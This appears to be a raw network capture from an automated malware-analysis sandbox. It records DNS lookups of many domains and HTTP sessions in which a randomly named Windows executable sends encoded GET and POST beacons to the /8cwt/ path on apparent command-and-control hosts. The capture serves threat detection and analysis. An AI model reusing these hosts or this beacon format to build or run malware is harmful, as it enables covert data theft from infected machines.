                                      Jun 4, 2024 14:19:07.789211988 CEST80498813.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:07.789452076 CEST4988180192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:07.791268110 CEST4988180192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:08.010230064 CEST80498813.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:08.011444092 CEST80498813.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:08.011562109 CEST80498813.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:08.011707067 CEST4988180192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:09.301762104 CEST4988180192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:10.319612980 CEST4988280192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:10.536730051 CEST80498823.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:10.536892891 CEST4988280192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:10.538608074 CEST4988280192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:10.755036116 CEST80498823.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:10.756767988 CEST80498823.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:10.756781101 CEST80498823.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:10.756925106 CEST4988280192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:12.051129103 CEST4988280192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:13.069298029 CEST4988380192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:13.288104057 CEST80498833.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:13.288296938 CEST4988380192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:13.290023088 CEST4988380192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:13.508411884 CEST80498833.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:13.509655952 CEST80498833.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:13.509669065 CEST80498833.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:13.509850025 CEST4988380192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:14.800522089 CEST4988380192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:15.818599939 CEST4988480192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:16.035437107 CEST80498843.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:16.035666943 CEST4988480192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:16.037266016 CEST4988480192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:16.253592968 CEST80498843.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:16.255780935 CEST80498843.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:16.255794048 CEST80498843.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:16.256088018 CEST4988480192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:16.258750916 CEST4988480192.168.11.303.64.163.50
                                      Jun 4, 2024 14:19:16.474833965 CEST80498843.64.163.50192.168.11.30
                                      Jun 4, 2024 14:19:37.885236025 CEST4988580192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:38.109141111 CEST804988591.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:38.109276056 CEST4988580192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:38.111289024 CEST4988580192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:38.335360050 CEST804988591.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:38.335374117 CEST804988591.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:38.335586071 CEST4988580192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:39.623145103 CEST4988580192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:40.641122103 CEST4988680192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:40.867917061 CEST804988691.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:40.868125916 CEST4988680192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:40.869891882 CEST4988680192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:41.097110033 CEST804988691.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:41.097215891 CEST804988691.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:41.097410917 CEST4988680192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:42.372498989 CEST4988680192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:43.391028881 CEST4988780192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:43.619393110 CEST804988791.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:43.619646072 CEST4988780192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:43.621416092 CEST4988780192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:43.849869967 CEST804988791.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:43.849981070 CEST804988791.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:43.849993944 CEST804988791.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:43.850092888 CEST804988791.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:43.850178003 CEST4988780192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:44.078535080 CEST804988791.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:46.155742884 CEST4988880192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:46.379941940 CEST804988891.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:46.380151987 CEST4988880192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:46.381886005 CEST4988880192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:46.606271029 CEST804988891.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:46.606283903 CEST804988891.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:46.606604099 CEST4988880192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:46.609461069 CEST4988880192.168.11.3091.195.240.19
                                      Jun 4, 2024 14:19:46.833589077 CEST804988891.195.240.19192.168.11.30
                                      Jun 4, 2024 14:19:51.817358971 CEST4988980192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:52.041409969 CEST804988991.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:52.041625977 CEST4988980192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:52.043632030 CEST4988980192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:52.268194914 CEST804988991.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:52.268207073 CEST804988991.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:52.268438101 CEST4988980192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:53.557526112 CEST4988980192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:54.575547934 CEST4989080192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:54.800019979 CEST804989091.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:54.800200939 CEST4989080192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:54.801759958 CEST4989080192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:55.026315928 CEST804989091.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:55.026329041 CEST804989091.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:55.026604891 CEST4989080192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:56.306888103 CEST4989080192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:57.324891090 CEST4989180192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:57.550837040 CEST804989191.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:57.551059008 CEST4989180192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:57.552762032 CEST4989180192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:19:57.778667927 CEST804989191.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:57.778769016 CEST804989191.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:57.778779030 CEST804989191.195.240.123192.168.11.30
                                      Jun 4, 2024 14:19:57.778786898 CEST804989191.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:00.074554920 CEST4989280192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:00.299987078 CEST804989291.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:00.300146103 CEST4989280192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:00.301908016 CEST4989280192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:00.527378082 CEST804989291.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:00.527390957 CEST804989291.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:00.527625084 CEST4989280192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:00.530397892 CEST4989280192.168.11.3091.195.240.123
                                      Jun 4, 2024 14:20:00.755651951 CEST804989291.195.240.123192.168.11.30
                                      Jun 4, 2024 14:20:08.588738918 CEST4989380192.168.11.30192.3.27.169
                                      Jun 4, 2024 14:20:08.738244057 CEST8049893192.3.27.169192.168.11.30
                                      Jun 4, 2024 14:20:08.738450050 CEST4989380192.168.11.30192.3.27.169
                                      Jun 4, 2024 14:20:08.740225077 CEST4989380192.168.11.30192.3.27.169
                                      Jun 4, 2024 14:20:08.889683962 CEST8049893192.3.27.169192.168.11.30
                                      Jun 4, 2024 14:20:09.059978008 CEST8049893192.3.27.169192.168.11.30
                                      Jun 4, 2024 14:20:09.060050964 CEST8049893192.3.27.169192.168.11.30
                                      Jun 4, 2024 14:20:09.060260057 CEST4989380192.168.11.30192.3.27.169
                                      Jun 4, 2024 14:20:09.062587023 CEST4989380192.168.11.30192.3.27.169
                                      Jun 4, 2024 14:20:09.212008953 CEST8049893192.3.27.169192.168.11.30
                                      Jun 4, 2024 14:20:14.074136019 CEST4989480192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:14.225457907 CEST8049894173.232.18.161192.168.11.30
                                      Jun 4, 2024 14:20:14.225764990 CEST4989480192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:14.228513002 CEST4989480192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:14.379839897 CEST8049894173.232.18.161192.168.11.30
                                      Jun 4, 2024 14:20:14.395673037 CEST8049894173.232.18.161192.168.11.30
                                      Jun 4, 2024 14:20:14.395695925 CEST8049894173.232.18.161192.168.11.30
                                      Jun 4, 2024 14:20:14.395853043 CEST4989480192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:15.740078926 CEST4989480192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:16.760067940 CEST4989580192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:16.911218882 CEST8049895173.232.18.161192.168.11.30
                                      Jun 4, 2024 14:20:16.911464930 CEST4989580192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:16.913436890 CEST4989580192.168.11.30173.232.18.161
                                      Jun 4, 2024 14:20:17.064719915 CEST8049895173.232.18.161192.168.11.30
                                      Jun 4, 2024 14:20:17.079696894 CEST8049895173.232.18.161192.168.11.30
                                      Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                      Jun 4, 2024 14:18:39.989677906 CEST53595569.9.9.9192.168.11.30
                                      Jun 4, 2024 14:18:53.246117115 CEST5412053192.168.11.309.9.9.9
                                      Jun 4, 2024 14:18:53.380063057 CEST53541209.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:07.414474010 CEST5759053192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:07.567127943 CEST53575909.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:21.270912886 CEST5195553192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:21.394455910 CEST53519559.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:29.456700087 CEST5925353192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:29.608365059 CEST53592539.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:37.673245907 CEST5655753192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:37.881947041 CEST53565579.9.9.9192.168.11.30
                                      Jun 4, 2024 14:19:51.623375893 CEST5759253192.168.11.309.9.9.9
                                      Jun 4, 2024 14:19:51.814904928 CEST53575929.9.9.9192.168.11.30
                                      Jun 4, 2024 14:22:55.049639940 CEST6505953192.168.11.309.9.9.9
                                      Jun 4, 2024 14:22:55.189209938 CEST53650599.9.9.9192.168.11.30
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Jun 4, 2024 14:14:44.312383890 CEST | 192.168.11.30 | 1.1.1.1 | 0x7c35 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:14:45.102452040 CEST | 192.168.11.30 | 1.1.1.1 | 0x655b | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:11.504376888 CEST | 192.168.11.30 | 1.1.1.1 | 0xc7fa | Standard query (0) | www.respirelavie.net | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:27.341855049 CEST | 192.168.11.30 | 1.1.1.1 | 0xc8d5 | Standard query (0) | www.airportsurvery.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:41.553247929 CEST | 192.168.11.30 | 1.1.1.1 | 0x13ef | Standard query (0) | www.innovtech.life | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:55.253355026 CEST | 192.168.11.30 | 1.1.1.1 | 0x3e08 | Standard query (0) | www.k4ryd.us | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:16:09.173129082 CEST | 192.168.11.30 | 1.1.1.1 | 0x9d8c | Standard query (0) | www.auetravel.kz | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:16:10.185338020 CEST | 192.168.11.30 | 9.9.9.9 | 0x9d8c | Standard query (0) | www.auetravel.kz | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:17:42.843122005 CEST | 192.168.11.30 | 1.1.1.1 | 0x5ff9 | Standard query (0) | www.accentbathrooms.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:01.664026976 CEST | 192.168.11.30 | 1.1.1.1 | 0xf0df | Standard query (0) | www.shun-yamagata.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:16.285159111 CEST | 192.168.11.30 | 1.1.1.1 | 0x66ef | Standard query (0) | www.donumul.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:24.474251986 CEST | 192.168.11.30 | 1.1.1.1 | 0xddcb | Standard query (0) | www.brongal.by | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:25.483484983 CEST | 192.168.11.30 | 9.9.9.9 | 0xddcb | Standard query (0) | www.brongal.by | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:39.811781883 CEST | 192.168.11.30 | 9.9.9.9 | 0x2fa7 | Standard query (0) | www.jdps.org | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:53.246117115 CEST | 192.168.11.30 | 9.9.9.9 | 0xfa77 | Standard query (0) | www.belgravevilla.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:07.414474010 CEST | 192.168.11.30 | 9.9.9.9 | 0xbb6c | Standard query (0) | www.insist.site | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:21.270912886 CEST | 192.168.11.30 | 9.9.9.9 | 0xa3ed | Standard query (0) | www.runonbattery.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:29.456700087 CEST | 192.168.11.30 | 9.9.9.9 | 0x833b | Standard query (0) | www.nemeanshop.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:37.673245907 CEST | 192.168.11.30 | 9.9.9.9 | 0x1874 | Standard query (0) | www.nurenose.com | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:51.623375893 CEST | 192.168.11.30 | 9.9.9.9 | 0x17ed | Standard query (0) | www.cd14j.us | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:22:55.049639940 CEST | 192.168.11.30 | 9.9.9.9 | 0xef91 | Standard query (0) | www.donumul.com | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Jun 4, 2024 14:14:44.448549986 CEST | 1.1.1.1 | 192.168.11.30 | 0x7c35 | No error (0) | drive.google.com |  | 142.250.217.174 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:14:45.221622944 CEST | 1.1.1.1 | 192.168.11.30 | 0x655b | No error (0) | drive.usercontent.google.com |  | 172.217.215.132 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:11.812799931 CEST | 1.1.1.1 | 192.168.11.30 | 0xc7fa | No error (0) | www.respirelavie.net | respirelavie.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:11.812799931 CEST | 1.1.1.1 | 192.168.11.30 | 0xc7fa | No error (0) | respirelavie.net |  | 192.3.27.169 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:27.484736919 CEST | 1.1.1.1 | 192.168.11.30 | 0xc8d5 | No error (0) | www.airportsurvery.com |  | 173.232.18.161 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:41.755414009 CEST | 1.1.1.1 | 192.168.11.30 | 0x13ef | No error (0) | www.innovtech.life |  | 203.161.49.193 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:15:55.439812899 CEST | 1.1.1.1 | 192.168.11.30 | 0x3e08 | No error (0) | www.k4ryd.us |  | 91.195.240.123 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:16:10.480017900 CEST | 1.1.1.1 | 192.168.11.30 | 0x9d8c | No error (0) | www.auetravel.kz |  | 89.35.125.17 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:16:10.552642107 CEST | 9.9.9.9 | 192.168.11.30 | 0x9d8c | No error (0) | www.auetravel.kz |  | 89.35.125.17 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:17:43.239758968 CEST | 1.1.1.1 | 192.168.11.30 | 0x5ff9 | No error (0) | www.accentbathrooms.com |  | 66.81.203.196 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:02.204690933 CEST | 1.1.1.1 | 192.168.11.30 | 0xf0df | No error (0) | www.shun-yamagata.com |  | 162.43.104.164 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:16.420972109 CEST | 1.1.1.1 | 192.168.11.30 | 0x66ef | Name error (3) | www.donumul.com | none | none | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:25.849226952 CEST | 9.9.9.9 | 192.168.11.30 | 0xddcb | No error (0) | www.brongal.by | brongal.by |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:25.849226952 CEST | 9.9.9.9 | 192.168.11.30 | 0xddcb | No error (0) | brongal.by |  | 93.125.99.134 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:26.475804090 CEST | 1.1.1.1 | 192.168.11.30 | 0xddcb | No error (0) | www.brongal.by | brongal.by |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:26.475804090 CEST | 1.1.1.1 | 192.168.11.30 | 0xddcb | No error (0) | brongal.by |  | 93.125.99.134 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:39.989677906 CEST | 9.9.9.9 | 192.168.11.30 | 0x2fa7 | No error (0) | www.jdps.org | comingsoon.namebright.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:39.989677906 CEST | 9.9.9.9 | 192.168.11.30 | 0x2fa7 | No error (0) | comingsoon.namebright.com | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:39.989677906 CEST | 9.9.9.9 | 192.168.11.30 | 0x2fa7 | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | 34.232.203.70 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:39.989677906 CEST | 9.9.9.9 | 192.168.11.30 | 0x2fa7 | No error (0) | cdl-lb-1356093980.us-east-1.elb.amazonaws.com |  | 34.231.96.3 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:53.380063057 CEST | 9.9.9.9 | 192.168.11.30 | 0xfa77 | No error (0) | www.belgravevilla.com | belgravevilla.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:18:53.380063057 CEST | 9.9.9.9 | 192.168.11.30 | 0xfa77 | No error (0) | belgravevilla.com |  | 92.205.8.26 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:07.567127943 CEST | 9.9.9.9 | 192.168.11.30 | 0xbb6c | No error (0) | www.insist.site |  | 3.64.163.50 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:21.394455910 CEST | 9.9.9.9 | 192.168.11.30 | 0xa3ed | Name error (3) | www.runonbattery.com | none | none | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:29.608365059 CEST | 9.9.9.9 | 192.168.11.30 | 0x833b | Name error (3) | www.nemeanshop.com | none | none | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:37.881947041 CEST | 9.9.9.9 | 192.168.11.30 | 0x1874 | No error (0) | www.nurenose.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:37.881947041 CEST | 9.9.9.9 | 192.168.11.30 | 0x1874 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:19:51.814904928 CEST | 9.9.9.9 | 192.168.11.30 | 0x17ed | No error (0) | www.cd14j.us |  | 91.195.240.123 | A (IP address) | IN (0x0001) | false
                                      Jun 4, 2024 14:22:55.189209938 CEST | 9.9.9.9 | 192.168.11.30 | 0xef91 | Name error (3) | www.donumul.com | none | none | A (IP address) | IN (0x0001) | false
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.11.30 | 49845 | 192.3.27.169 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:15:11.970091105 CEST | 431 | OUT | GET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.respirelavie.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:12.291779041 CEST | 401 | IN | HTTP/1.1 400 Bad Request
                                      Date: Tue, 04 Jun 2024 12:15:10 GMT
                                      Server:
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 150
                                      Connection: close
                                      X-XSS-Protection: 1; mode=block
                                      X-Content-Type-Options: nosniff
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.11.30 | 49847 | 173.232.18.161 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:15:27.639980078 CEST | 704 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=HCML38UUrPa9Giksyv9KCAQTfaTX4WJKMBhdGLWzH7TaFL2K38UKKE3SE7IDXv1ymDPWihhwK/SGumcgnPcehJVqjKJflvCd6kSz1x05IYvSbJl3LkB3Zex4hj/uaFevZ66RGwXXN9OSBVbnP31nGsrcBgf7j/WFY/wbwLZ0h6O70XYidWOqsQVGNxMkjNVDFA==
                                      Jun 4, 2024 14:15:27.807467937 CEST | 974 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:50 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.11.30 | 49848 | 173.232.18.161 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:15:30.318486929 CEST | 724 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=HCML38UUrPa9ACUs0O9KVwQcQ6TXjGJOMBddGJ6ZEInaFuKK29UKZ03SKbICTv19mDDeikZwK/GGumMgn4oZgZVooqJdrPCd6kSz1xwHIcDSbZV3LG52HOxngj/uLVerZ66vG0X9N4KSBVrnMjhkPsraOAeRu+zNefA979BYko6x1Ap4AV6o/wprRwhMhPUYYEO3SvtwAH/ij/3l4MBd5sQ=
                                      Jun 4, 2024 14:15:30.485426903 CEST | 974 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:53 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.11.30 | 49849 | 173.232.18.161 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:15:33.008725882 CEST | 1641 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.airportsurvery.com
                                      Referer: http://www.airportsurvery.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:33.175259113 CEST | 974 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:55 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.11.30 | 49850 | 173.232.18.161 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:15:35.691826105 CEST | 433 | OUT | GET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
